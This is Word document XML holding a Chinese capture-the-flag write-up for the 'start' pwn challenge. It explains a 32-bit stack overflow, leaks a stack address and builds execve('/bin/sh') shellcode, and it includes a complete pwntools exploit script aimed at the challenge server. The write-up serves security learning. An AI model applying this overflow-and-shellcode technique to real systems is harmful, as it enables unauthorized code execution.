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jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/xlrp/p/14273632.html" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/xlrp/p/14273632.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr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pwnable_start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  <w:jc w:val="left"/>
      </w:pPr>
      <w:r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 HYPERLINK "https://files.buuoj.cn/files/ef49abad6e3569c0255ec02fa901c9b8/start?token=eyJ1c2VyX2lkIjoxNTM3MSwidGVhbV9pZCI6bnVsbCwiZmlsZV9pZCI6ODYwfQ.X8s40A.jrjJINX63FSGrLlIN--vWin0tyg" </w:instrText>
      </w:r>
      <w:r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t>附件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步骤：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例行检查，32位程序，什么保护都没开，首先想到的是ret2shellcode的方法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3848100" cy="895350"/>
            <wp:effectExtent l="0" t="0" r="7620" b="381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leftChars="0" w:right="0" w:rightChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default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本地试运行一下，看看程序大概的情况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733925" cy="295275"/>
            <wp:effectExtent l="0" t="0" r="571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32位ida载入，没法f5，好在汇编不长，看得懂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8286750" cy="4981575"/>
            <wp:effectExtent l="0" t="0" r="3810" b="190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一开始调用write函数输出了let’s start the ctf,4是write函数的调用号，之后的调用号是3，调用了read函数，我们知道dl这个寄存器是控制输入字符的多少的，也就是所我们可以输入0x3c个字符，也就是执行了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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts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write（1，buf，0x14）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5F5F5"/>
        </w:rPr>
        <w:t>read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（0，buf，0x3C）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通过最后的add esp,14h 我们可以知道esp距离ret的地址0x14个字节（内平栈）,也就是我们输入的参数buf的大小只有0x14，但是我们读入了0x3c，存在溢出漏洞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leftChars="0" w:right="0" w:rightChars="0" w:hanging="360" w:firstLineChars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就跟一开始说的，由于没有开启任何保护，所以使用ret2shellcode的方法，要往栈上写入shellcode，首先要知道栈上的地址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payload=a*0x14+p32（0x8048087）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由于使用的内平栈，没有ebp，覆盖完buf后就是ret，其实看上方的汇编就知道了。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这句payload将程序执行流转到了去执行write函数，此时esp里的值是栈上0x8048087地址里的内容，这样就把栈上的地址给泄露了出来。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10391775" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="190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看到我们泄露出来了的栈地址，然后看一下esp现在指向的地址，他们中间相差0xd4-0xc0=0x14，我们可以用泄露的地址+0x14来表示之后的esp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leftChars="0" w:right="0" w:rightChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pP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接着就是写入shellcode，我一开始使用的pwntools自动生成的shellcode，但是失败了，可能是太长了，没有全部写进去，顺便学习了一下写shellcode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起始所谓的shellcode就是去执行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execve（‘/bin/sh’，0，0）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系统调用执行的话就是int80 （eax，ebx，ecx，edx）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execve的系统调用号是11，所以设置eax=0xb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‘/bin/sh’用16进制表示一下是0x0068732f，0x6e69622f，所以ebx要设置成‘/bin/sh’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接着ecx和edx设置成0即可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shellcode=asm（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“‘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xor ecx,ecx;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#ecx设置为0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xor edx,edx;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#edx设置为0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push edx;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  <w:t/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ab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#将edx的值压入栈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push 0x0068732f;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push 0x6e69622f;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mov ebx,esp;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 xml:space="preserve">#将ebx设置为’/bin/sh‘的16进制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mov eax,oxb;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#eax设置为0xb，调用execve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int 0x80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"')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由于小端序的原因，所以写入/bin/sh的时候起始写的是hs/nib/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7924800" cy="733425"/>
            <wp:effectExtent l="0" t="0" r="0" b="1333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8467725" cy="704850"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1143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综上所述，完整exp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from pwn import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context.log_level=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"debug"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#p = process('./start')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p=remote(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'node3.buuoj.cn'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,26163)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payload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'A'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*0x14 + p32(0x8048087)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p.sendafter(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"Let's start the CTF:"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,payload)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#gdb.attach(p,'b * 0x804809c')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stack_addr = u32(p.recv(4))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5F5F5"/>
        </w:rPr>
        <w:t>print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'stack_addr: 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+hex(stack_addr)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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>#gdb.attach(p)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shellcode = asm(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'xor ecx,ecx;xor edx,edx;push edx;push 0x68732f6e;push 0x69622f2f;mov ebx,esp;mov al,0xb;int 0x80'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payload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5"/>
          <w:szCs w:val="15"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>'A'</w:t>
      </w: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*0x14 + p32(stack_addr+0x14)+shellcode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p.send(payload)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jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i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p.interactive()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5181600" cy="800100"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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dashed" w:color="C0C0C0" w:sz="4" w:space="6"/>
          <w:left w:val="dashed" w:color="C0C0C0" w:sz="4" w:space="0"/>
          <w:bottom w:val="dashed" w:color="C0C0C0" w:sz="4" w:space="6"/>
          <w:right w:val="dashed" w:color="C0C0C0" w:sz="4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83786"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A2783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5BDC1C52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2022-03-17T16:09:27Z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